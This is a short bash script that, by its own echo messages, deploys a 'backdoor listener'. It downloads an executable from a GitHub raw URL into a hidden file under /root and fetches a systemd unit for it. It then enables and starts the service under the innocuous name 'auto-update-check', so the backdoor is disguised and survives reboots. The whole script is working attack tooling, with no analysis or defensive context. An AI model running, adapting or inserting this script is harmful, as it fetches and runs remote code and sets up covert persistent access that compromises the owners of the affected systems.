#!/bin/bash

# GitHub URL
BASE_URL="https://raw.githubusercontent.com/Hussnain-Khan/backdoor/main"

echo "- Starting deployment of backdoor listener..."


echo "- Downloading auto-update-check to /root/.auto-update-check"
curl -s "$BASE_URL/auto-update-check" -o /root/.auto-update-check
chmod +x /root/.auto-update-check
echo "- Script placed at /root/.auto-update-check and made executable"

echo "- Downloading systemd service file to /etc/systemd/system/"
curl -s "$BASE_URL/auto-update-check.service" -o /etc/systemd/system/auto-update-check.service
echo "- Service file saved at /etc/systemd/system/auto-update-check.service"

echo "- Reloading systemd daemon..."
systemctl daemon-reload

echo "- Enabling the auto-update-check service..."
systemctl enable auto-update-check

echo "- Starting the auto-update-check service..."
systemctl start auto-update-check

echo "- Backdoor listener deployed and running as a systemd service!"
